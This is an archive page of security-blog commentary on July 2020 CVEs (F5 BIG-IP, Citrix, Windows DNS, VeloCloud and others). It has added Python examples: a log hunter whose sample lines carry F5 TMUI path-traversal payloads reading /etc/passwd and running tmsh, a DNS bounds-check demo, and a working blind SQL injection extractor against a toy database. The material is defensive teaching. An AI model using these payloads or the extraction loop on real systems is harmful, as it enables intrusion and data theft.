Category Archives: Potential Risk of CVE

Joint alert from CISA & NCSC – Potential Legacy Risk from Malware Targeting QNAP NAS Devices – 27th JUL, 2020

Preface: A simple Shodan search turns up a large number of QNAP NAS devices reachable from the Internet.

Installation status of NAS (QNAP) around the world: It is no surprise that QNAP NAS equipment has a huge customer footprint. The price is reasonable for what you get (RAID 5 out of the box), so it is cost-effective, and businesses up to medium-sized enterprises are willing to use it. Perhaps the IT team assumes that patch management takes care of the risk, and so these NAS devices end up connected directly to the Internet.

Vulnerability details: All QNAP NAS devices are potentially vulnerable to the QSnatch malware if they have not been updated with the latest security fixes.

Important note: Keeping the NAS off the Internet does not stop an attack that arrives through a client machine. If a compromised client holds a mapped SMB share with write permission, the NAS is reachable through that share. The practical defences are to disconnect mapped drives once you have finished using them, and above all to keep up with patch management.

CISA and NCSC also share the following mitigations to prevent future attacks:
• Verify that you purchased QNAP devices from reputable sources. If sources are in question, run a full factory reset on the device prior to completing the firmware upgrade.
• Block external connections when the device is intended to be used strictly for internal storage.

CISA urges F5 users to stay vigilant to deal with CVE-2020-5902 (24th Jul 2020)

Preface: As of today, F5 BIG-IP Platform has market share 72%.

Background: On 24th July 2020 the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published an alert urging F5 customers to stay alert. CISA has evidence that attackers are actively exploiting CVE-2020-5902, an unauthenticated remote code execution (RCE) vulnerability in the Traffic Management User Interface (TMUI), the management interface of F5's BIG-IP application delivery controller (ADC) products.

Vulnerability detail: With reference to the attached picture, security experts pointed out that the flaw is reachable over HTTP/HTTPS. The key impact is that an attacker can get into the device and execute code remotely; an attacker can also read files on the F5 operating system, including stored credentials.

CISA alert: CISA recommends that all organizations go through the following action list while hunting for signs of exploitation:

Quarantine or take offline potentially affected systems
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections
Deploy a CISA-created Snort signature to detect malicious activity (available in the alert under Detection Methods)

F5 remedy plan: https://support.f5.com/csp/article/K52145254

Corrective control suggested by the vendor: to mitigate this vulnerability on affected F5 products, permit management access (the TMUI) only over a secure, internal network.
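The CISA action list above asks you to review recent network connections and to deploy a Snort signature. As an added example (not from the CISA alert, not F5's code), the script below does the equivalent hunt over web-server access logs: it flags requests under /tmui/ whose path contains the "..;" path-normalisation sequence that the public detection guidance keys on, including percent-encoded variants. The log lines are constructed for the example; the IP addresses and endpoints are sample data, and the function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache "combined" style), not real traffic.
# Two requests carry the "..;" sequence under /tmui/; one of them is URL-encoded.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jul/2020:10:01:12 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4112 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Jul/2020:10:01:15 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843 "-" "python-requests/2.24"
198.51.100.9 - - [05/Jul/2020:10:02:40 +0000] "GET /tmui/login.jsp/%2e%2e%3b/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user HTTP/1.1" 200 922 "-" "curl/7.68.0"
192.0.2.33 - - [05/Jul/2020:10:03:01 +0000] "POST /mgmt/shared/authn/login HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(target: str) -> str:
    """Drop the query string and percent-decode until stable (bounded, so
    double-encoded payloads such as %252e are also unwrapped)."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower()


def is_tmui_traversal(target: str) -> bool:
    """True when the request path is under /tmui/ and contains the '..;' sequence."""
    path = normalise_path(target)
    return path.startswith("/tmui/") and "..;" in path


def hunt(log_text: str) -> list:
    """Return one record per suspicious request; 'served' marks a 200 response,
    which is the stronger signal because a patched or mitigated device rejects it."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        if is_tmui_traversal(m["target"]):
            hits.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "target": m["target"],
                "status": int(m["status"]),
                "served": m["status"] == "200",
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

Treat a match as a reason to investigate, not as proof of compromise, and an empty result as no proof of absence: the check only covers the /tmui/ prefix and the encodings that unquote() undoes, and an attacker who already has a shell no longer needs the traversal request. A 200 response to one of these requests before the patch was applied is the case to escalate.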

Citrix Workspace app for Windows Security Update CVE-2020-8207 (23-07-2020)

Preface: Input validation is hard when an environment combines many features. Even when software developers follow the guidelines, a design that relies on HTTP or HTTPS connections adds to the difficulty.

Background: Citrix Workspace app consists of the Citrix Receiver core, HDX engine, the new embedded browser engine, files view and mobile app aggregation.
By default, Citrix Workspace Updates is disabled on the VDA. This includes RDS multi-user server machines, VDI and Remote PC Access machines.

Vulnerability details: Improper access control in Citrix Workspace app for Windows 1912 CU1 and 2006.1 causes privilege escalation and code execution when the automatic updater service is running. The official details are at the URL below:

https://support.citrix.com/article/CTX277662

Observation: One possible method is the connection path shown in the attached diagram. If the Citrix Workspace app is installed on a compromised workstation, an attacker can use an HTTP or HTTPS connection to exploit an SMB design weakness and go on to compromise the Active Directory system. The concept is illustrated in the attached diagram.
Remark: The design weakness sits in the Citrix Workspace app itself; its input validation appears to need improvement.

Vulnerabilities in SICAM MMU, SICAM T and SICAM SGU (Jul 2020)

Preface: In industry, power plants and substations, the SICAM MMU is used to measure and calculate electrical parameters.

Product background: SICAM T (transducer) is a digital measuring sensor that allows the measurement of electrical quantities in electrical networks in a single unit. SICAM MMU (Measurement and Monitoring Unit) is a power monitoring device that measures electrical quantities in the power grid.

Remark: SICAM SGU has been discontinued.

Security Focus: CVE-2020-10042 – A buffer overflow in various positions of the web application might enable an attacker with access to the web application to execute arbitrary code over the network.

My observation:

Fundamental theory: For custom application software, all code that accepts input from users via an HTTP request must be reviewed to ensure that it can properly handle arbitrarily large input.


Possibility (speculation): By the definition of CWE-120, the overflow most likely sits where input is copied into a fixed-size buffer in a loop without a proper length check. One candidate is the server-side handler for form fields that the web page updates dynamically via JavaScript: if the handler relies on the field length that the page enforces client-side, an attacker who sends the request directly does not have to respect that limit, and the handler fails.

Synopsis: By sending carefully crafted input to an application, an attacker can cause the application to execute arbitrary code, possibly taking over the machine.

Official announcement: https://cert-portal.siemens.com/productcert/pdf/ssa-305120.pdf

Sometimes he is a friend, but suddenly…. (MAR-10296782-1.v1 – SOREFANG) – 29th Jul 2020 [Recent goal: targeting COVID-19 research and vaccine development]

Preface: It looks as if whoever has a COVID-19 vaccine will be granted dominance of the world.

Reference: DVC APIs help you implement modules on the server and client side of a Remote Desktop Services connection that communicate with each other. A remote code execution vulnerability exists in Remote Desktop Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests…… (CVE-2019-1182)

Description: Perhaps my research does not clearly reflect the actual status of the current malicious goal, but everyone is looking for a vaccine. My personal interest drew my attention to a malware called "SOREFANG". It appears that a vendor became a victim in this case, because the attacker or APT group re-engineered the vendor's VPN software. That company has a large footprint in China. The details of my observation and research are written on the attached diagram; those who are interested should refer to it.

Highlight: Vendor announcement: the only vulnerable servers are Sangfor servers running firmware versions M6.1 and M6.3R1. The statement says that other servers are not affected by the zero-day used by the attacker.

Point of view – CVE-2020-1350 Windows DNS Server RCE (14th Jul 2020)

Preface: Perhaps we have ignored DNS server-side design weaknesses so far. They are on their way to impacting the cyber security world.

Background: DNS is a hierarchical client-server protocol. Each domain is served by one or more DNS servers, meaning requests for subdomains are sent to these servers. Replies can also be cached by intermediate servers in order to improve performance.

(CVE-2020-1350) Vulnerability detail: A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests.

Official detail – https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350

Observation: The flaw may be related to a weak bounds check on RDLENGTH. If the pointer arithmetic in that check overflows and wraps around (undefined behaviour in C), an attacker can get past the bounds check, and the attacker-controlled addrlen is later used in memcpy(addr_out, bufpos, addrlen), producing a buffer overflow that can lead to code execution. Microsoft's advisory does not describe the root cause, so this remains an inference rather than a confirmed analysis.
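To make the observation concrete, here is an added example (my own code, not Microsoft's DNS server code and not a reproduction of CVE-2020-1350) that parses one DNS resource record from the wire format and shows the two ways of writing the RDLENGTH check: the safe form compares the length with the bytes that remain, while the weak form computes an end position first and can wrap. The wrap is emulated at 16 bits so it is visible on a small buffer; the records, names and function names are constructed for the example.

```python
import struct


def build_rr(name, rtype, ttl, rdata, rdlength=None):
    """Encode one RR (RFC 1035 layout: NAME, TYPE, CLASS, TTL, RDLENGTH, RDATA).
    rdlength may be forged so it disagrees with len(rdata), as an attacker would."""
    wire = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    wire += struct.pack("!HHIH", rtype, 1, ttl, len(rdata) if rdlength is None else rdlength)
    return wire + rdata


def read_name(buf, offset, depth=0):
    """Parse a (possibly compressed) name; every read is checked against len(buf)."""
    if depth > 5:
        raise ValueError("too many compression pointers")
    labels = []
    while True:
        if offset >= len(buf):
            raise ValueError("name runs past end of buffer")
        length = buf[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0 == 0xC0:                      # compression pointer
            if offset + 1 >= len(buf):
                raise ValueError("truncated compression pointer")
            ptr = ((length & 0x3F) << 8) | buf[offset + 1]
            if ptr >= offset:
                raise ValueError("compression pointer must point backwards")
            tail, _ = read_name(buf, ptr, depth + 1)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        if offset + length > len(buf):
            raise ValueError("label runs past end of buffer")
        labels.append(buf[offset:offset + length].decode("ascii"))
        offset += length


def safe_in_bounds(bufpos, addrlen, buflen):
    """Compare the length with the space that remains; never form an end pointer."""
    return bufpos <= buflen and addrlen <= buflen - bufpos


def wrapping_in_bounds(bufpos, addrlen, buflen, width=16):
    """Emulation of the weak check described above: the end position is computed
    first and wraps at `width` bits (undefined behaviour in C; narrowed here so
    the wrap shows up on a 27-byte buffer)."""
    end = (bufpos + addrlen) & ((1 << width) - 1)
    return end <= buflen


def parse_rr(buf, offset=0):
    name, offset = read_name(buf, offset)
    if offset + 10 > len(buf):
        raise ValueError("truncated RR header")
    rtype, rclass, ttl, rdlength = struct.unpack_from("!HHIH", buf, offset)
    offset += 10
    if not safe_in_bounds(offset, rdlength, len(buf)):
        raise ValueError(f"RDLENGTH {rdlength} exceeds the {len(buf) - offset} bytes remaining")
    rdata = buf[offset:offset + rdlength]             # the copy happens only after the check
    return {"name": name, "type": rtype, "class": rclass, "ttl": ttl, "rdata": rdata}, offset + rdlength


# Constructed records: a well-formed A record and one whose RDLENGTH is forged to 0xFFFF.
GOOD_RR = build_rr("example.com", 1, 300, bytes([93, 184, 216, 34]))
BAD_RR = build_rr("example.com", 1, 300, b"\x00\x00\x00\x00", rdlength=0xFFFF)
RDATA_OFFSET = 13 + 10   # 13-byte encoded name plus the 10-byte fixed header


def demo():
    """Return (parsed good record, weak-check verdict, safe-check verdict for BAD_RR)."""
    good, _ = parse_rr(GOOD_RR)
    weak = wrapping_in_bounds(RDATA_OFFSET, 0xFFFF, len(BAD_RR))   # (23 + 65535) & 0xFFFF = 22 <= 27: accepted
    safe = safe_in_bounds(RDATA_OFFSET, 0xFFFF, len(BAD_RR))       # 65535 > 4 bytes remaining: rejected
    return good, weak, safe


if __name__ == "__main__":
    good, weak, safe = demo()
    print(good, "weak check accepts forged RDLENGTH:", weak, "safe check accepts:", safe)
```

The lesson is independent of the emulated width: once an attacker-supplied length is added to a position before the comparison, the arithmetic can wrap and the comparison no longer protects the copy that follows. Checking `addrlen <= buflen - bufpos` after confirming `bufpos <= buflen` cannot wrap.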

Even if you have a Phoenix shield, everything depends on the endpoint – 14th Jul 2020

Preface: Mobile 50.13%, desktop 47.06% (share of device usage, June 2019 to June 2020).

Background: MobileIron helps you simplify the configuration of enterprise settings including email, Wi-Fi, and VPN and more. Meanwhile, MobileIron provides unified endpoint and enterprise mobility management (EMM) for mobile devices.

Vulnerabilities details: Please refer to url https://www.mobileiron.com/en/blog/mobileiron-security-updates-available

Comment: The official announcement does not give the root cause of the vulnerability, so we have to reason from common attack techniques. Apart from the scenario shown in the attached diagram, an attacker can use malware to carry out the attack, for instance by implanting it on the endpoint through a phishing attack. Once the software token has been activated, such malware can read the plaintext derived credentials from flash storage and transmit them to the adversary operating the malware, who can then use them at will from a different machine.

Reflections on the PoC – Aruba ClearPass Policy Manager multiple vulnerabilities (13th Jul 2020)

Preface: Wi-Fi began as access for a small group of users and has since extended into enterprise infrastructure; even IoT, Industry 4.0 and industrial systems, especially ICS and IACS, now carry its footprint.

Background: Aruba’s ClearPass Policy Manager, part of the Aruba 360 Secure Fabric, provides role- and device-based secure network access control for IoT, BYOD, corporate devices, as well as employees, contractors and guests across any multivendor wired, wireless and VPN infrastructure.

About the subject: The official announcement has been released on 2nd June 2020 – https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2020-005.txt

However, the details of the PoC were only released two days ago. The PoC shows that it relies on the C preprocessor generic programming interface defined in unistd[.]h, and that it needs a compiler and re-engineering of the payload library.
The most important point is that user authentication is required to use the PoC code successfully. However, if the system administrator never patched CVE-2018-7076, that gives the attacker a foothold, making it easy to exploit the vulnerabilities disclosed in June 2020.

Security focus: Citrix security bulletin CTX276688 (9th Jul 2020)

Preface: Typically, North-South traffic is load balanced by Ingress devices such as Citrix ADCs while East-West traffic is load balanced by kube-proxy. Since kube-proxy only provides limited layer-4 load balancing, service owners can utilize the Citrix ingress controller to achieve sophisticated layer-7 controls for East-West traffic using the Ingress CPX ADCs.

Security Focus: According to the Citrix security bulletin CTX276688, there are a total of 11 vulnerabilities. Among them, CVE-2020-8191 is a reflected cross-site scripting (XSS) vulnerability, which gives an attacker a way to steal a session cookie. That matters because several of the other vulnerabilities require user credentials: a stolen session cookie is one way to satisfy that precondition.

Background: The NSIP address is the IP address at which you access the Citrix ADC appliance for management purposes. The appliance can have only one NSIP, which is also called the management IP address. You must add this IP address when you configure the Citrix ADC for the first time. You cannot remove an NSIP address.

Vulnerability detail: Citrix ADC and Citrix Gateway could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified flaw. By sending a specially crafted request, an authenticated attacker could exploit this vulnerability to gain elevated privileges. The XSS vulnerability can be used to steal the session cookie that provides that authenticated position.

Official announcement – https://support.citrix.com/article/CTX276688

VMware release security update for VeloCloud – 7th Jul 2020

Background: The VMware SD-WAN Orchestrator provides centralized enterprise-wide installation, configuration and real-time monitoring in addition to orchestrating the data flow through the cloud network.

Technical highlight – The VeloCloud Orchestrator (VCO) stores only flow statistics with high resolution to provide visibility and troubleshooting capability.
By default, a maximum of one million flows are rolled up per edge per day. This averages out to approximately 3500 flows per 5-minute push.

Vulnerability details: The 3.3.0 release of the VeloCloud Orchestrator (VCO) stored only the high-resolution flow statistics described above. The 3.3.2 release adds retention of flow statistics for up to one year by rolling up the flow statistics of every edge on a daily basis. For this the Orchestrator connects to a MySQL server, and this is where the design weakness sits: the original design does not apply correct input validation, which allows blind SQL injection.

Impact: An attacker with access to the Orchestrator can inject crafted SQL into these queries and obtain data to which they are not privileged.

Official announcement – https://www.vmware.com/security/advisories/VMSA-2020-0016.html
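What "blind" SQL injection means in practice, as an added example (my own code, not VMware's Orchestrator code): the attacker never sees the query's error text or the injected data directly; the only oracle is whether a flow-statistics lookup returns a row, and that single bit is enough to extract another tenant's secret one character at a time. The schema, table and column names are assumptions, and sqlite3 stands in for MySQL so the example runs offline; the hardened query beside the weak one shows the fix (bound parameters instead of string splicing).

```python
import sqlite3


def make_db():
    """Constructed stand-in for the Orchestrator's statistics database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE edges (id INTEGER PRIMARY KEY, name TEXT, enterprise_id INTEGER);
        CREATE TABLE flow_stats (edge_id INTEGER, day TEXT, flows INTEGER);
        CREATE TABLE api_tokens (enterprise_id INTEGER, token TEXT);
        INSERT INTO edges VALUES (1, 'edge-hq', 10), (2, 'edge-branch', 20);
        INSERT INTO flow_stats VALUES (1, '2020-07-01', 950000), (2, '2020-07-01', 12000);
        INSERT INTO api_tokens VALUES (10, 's3cr3t'), (20, 'tok-20');
    """)
    return conn


CALLER_ENTERPRISE = 20   # the tenant the caller's (here: the attacker's) session belongs to


def daily_flows_vulnerable(conn, edge_name):
    """Weak form: the caller-controlled edge name is spliced into the statement text."""
    sql = ("SELECT fs.flows FROM flow_stats fs JOIN edges e ON e.id = fs.edge_id "
           f"WHERE e.name = '{edge_name}' AND e.enterprise_id = {CALLER_ENTERPRISE}")
    return conn.execute(sql).fetchall()


def daily_flows_fixed(conn, edge_name):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    sql = ("SELECT fs.flows FROM flow_stats fs JOIN edges e ON e.id = fs.edge_id "
           "WHERE e.name = ? AND e.enterprise_id = ?")
    return conn.execute(sql, (edge_name, CALLER_ENTERPRISE)).fetchall()


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_"


def blind_extract(conn, query_fn, max_len=32):
    """Boolean-based blind extraction of enterprise 10's token through query_fn.
    The only signal is row / no row; nothing from api_tokens is ever echoed."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            # Closes the name literal, appends a condition on one character of the
            # secret, and leaves the original trailing "AND e.enterprise_id = 20" intact.
            probe = ("edge-branch' AND substr((SELECT token FROM api_tokens "
                     f"WHERE enterprise_id = 10), {pos}, 1) = '{ch}")
            if query_fn(conn, probe):
                recovered += ch
                break
        else:
            break   # no character matched: end of the value, or the injection was blocked
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query leaks:", blind_extract(db, daily_flows_vulnerable))
    print("fixed query leaks:     ", repr(blind_extract(db, daily_flows_fixed)))
```

Against the hardened query the probe is just a strange edge name that matches nothing, so the extraction loop stops at the first position with nothing recovered. Two follow-up checks a practitioner would add: run the Orchestrator's database account with read access limited to the tables the statistics feature needs, so that even a successful injection cannot reach other tenants' secrets, and alert on a burst of lookups that differ only in a single character of the request, which is the signature of this extraction loop.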